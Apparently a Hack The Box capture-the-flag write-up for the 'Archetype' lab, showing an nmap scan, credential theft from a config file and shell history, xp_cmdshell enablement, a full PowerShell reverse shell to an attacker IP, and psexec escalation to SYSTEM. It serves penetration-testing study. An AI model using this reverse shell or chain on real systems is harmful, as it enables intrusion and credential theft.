Archetype
Scanning
# Nmap 7.80 scan initiated Fri Jun 18 02:52:56 2021 as: nmap -sC -sV -oA nmap/nmap 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up (0.048s latency).
Not shown: 996 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-06-18T07:06:04
|_Not valid after: 2051-06-18T07:06:04
|_ssl-date: 2021-06-18T07:11:38+00:00; +18m24s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h42m23s, deviation: 3h07m50s, median: 18m23s
| ms-sql-info:
| 10.10.10.27:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM
| number: 14.00.1000.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| smb-os-discovery:
| OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
| Computer name: Archetype
| NetBIOS computer name: ARCHETYPE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-06-18T00:11:29-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-18T07:11:30
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jun 18 02:53:14 2021 -- 1 IP address (1 host up) scanned in 18.46 seconds
Download file
Since I couldn't read the configuration file I downloaded it to my host with the get [remote-file-name] [local-file-name] command.
smb: \> get prod.dtsConfig conf
getting file \prod.dtsConfig of size 609 as conf (3.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)
Credentials
Once the configuration file is open, I can see the credentials in it: ARCHETYPE\sql_svc:M3g4c0rp123Since SQL appears on the user sunday most likely he is part of SQL account. In fact, from the Nmap scan, there is an ms-sql-s service on port 1322.
Access SQL
When it prompt for the password, enter the password found in the configuration file.
$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>
Current user permission
To check the permissions of the current user I execute the following query, if from 1 then it means that he has the permissions indicated otherwise not.
SQL>
select IS_SRVROLEMEMBER ('sysadmin')
-----------
1
Remote Code Execution
I make an attempt to run some code with the xp_cmdshell function. I have to run the command EXEC sp_configure 'Show Advanced Options', 1; to configure xp_cmdshell and after each command, I have to issue reconfigure;. Instead, to enable it I have to run this other command EXEC sp_configure 'xp_cmdshell', 1; and obviously reconfigure;. And finally, I can execute the commands xp_cmdshell <"command">.
EXEC sp_configure('Show Advanced Options', 1);
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
reconfigure;
EXEC sp_configure('xp_cmdshell', 1);
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
reconfigure;
xp_cmdshell "whoami"
output
--------------------------------------------------------------------------------
archetype\sql_svc
NULL
Reverse shell
For the reverse shell I have to use the one indicated on the official writeup as it checks for malicious pieces of Powershell code.
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.84", 4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | %{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
$sendback = (iex $data 2>&1 | Out-String);
$sendback2 = $sendback + "# ";
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
}
$client.Close();
Copy and paste the code into a text file and save it with the .ps1 extension.
Note
PS" + (pwd).Path + "> has been replaced with `#` because it is identified as a malicious string, moreover, that string is not in any way useful for the operation of the reverse shell but only serves to give a friendlier prompt to the user. This issue was thiscussed in the following link at the time whe the box was active: https://forum.hackthebox.eu/discussion/3509/starting-point.In order to download the reverse shell I have to start e web server, for simplicity in the same forder where i have my reverse shell.
Serving HTTP on 0.0.0.0 port 8800 (http://0.0.0.0:8800/) ...
10.10.10.27 - - [19/Jun/2021 06:24:20] "GET /rev.ps1 HTTP/1.1" 200 -
Before downloading and executing the reverse shell I have to listen to the set port with NetCat on another shell.
And finally to download and execute in one shot the reverse shell I use the following Powershell command on the SQL shell, the one where I used mssqlclient.py.
Once connected I obtained a shell where I can run Windows commands.
10.10.10.27: inverse host lookup failed: Unknown host
connect to [10.10.14.84] from (UNKNOWN) [10.10.10.27] 49681
#
User flag
As this is a normal user account as well as a service account, it is worth checking for frequently access files or executed commands. We can use the command below to accessed the PowerShell history file.
# type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
So the credentials for the share backups are: administrator:MEGACORP_4dm1n!!.
(kali@kali)~/htb/archetype$
python3/usr/share/doc/python3-impacket/examples/psexec.py administrator@10.10.10.27
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file ehFXfEZp.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service FpdE on 10.10.10.27.....
[*] Starting service FpdE.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Root flag
Directory of C:\Users\Administrator\Desktop
01/20/2020 06:42 AM <DIR> .
01/20/2020 06:42 AM <DIR> ..
02/25/2020 07:36 AM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 33,819,779,072 bytes free
C:\Users\Administrator\Desktop>type root.txt
b91ccec3305e98240082d4474b848528